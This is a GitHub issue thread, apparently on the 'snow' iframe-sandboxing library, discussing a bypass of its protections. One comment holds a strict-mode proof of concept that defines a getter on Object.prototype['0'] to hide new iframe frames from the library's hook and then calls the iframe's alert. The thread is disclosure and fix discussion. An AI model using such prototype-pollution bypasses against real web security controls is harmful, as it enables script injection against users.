Snow can be bypassed with overriding the "arguments" object prototype about snow HOT 6 CLOSED

Note that the prototype of an arguments object is just the primordial Object.prototype (cf. CreateUnmappedArgumentsObject and CreateMappedArgumentsObject).

from snow.

I think an important conclusion here is that in contrast to the title of this issue, the exploit is not about the arguments object specifically, but it's about Snow not being careful when accessing indexed properties.

as proof, in the exploit poc, arguments.__proto__ can be replaced with Object.prototype/Array.prototype and it'll still work

from snow.

nice find @benjamingr

from snow.

Thanks, cool project! I warmly recommend figuring out how to run static analysis to find these (which would be a cool project on its own) :)

• For JavaScript I would pursue something similar to what @erights worked on here https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/37199.pdf
• For the DOM I'd pursue something similar autogenerated from the WebIDL of the spec so you can automatically keep up to date with the changing standard

Otherwise it's "whack a mole" with "did you find all the places JS is surprisingly dynamic in your code and all the places the DOM allows insertion".

from snow.

Conclusion: It's also doable in strict mode

(function() {
"use strict"
  Object.defineProperty(Object.prototype, '0', {
    get() {
      const whereAmI = (new Error).stack;
      if (whereAmI.includes('hook')) {
        this.length = 0; // empty frames array
        return undefined;
      }
      return this.payload;  
    },
    set(value) {
      // debugger;
      this.length = 1;
      this.payload = value;
    }
  });
})();

const fr = document.createElement('iframe');
document.body.appendChild(fr);
fr.contentWindow.alert.call(null, 'pwn');

from snow.

solution in progress

#14

EDIT:

#15 is better

from snow.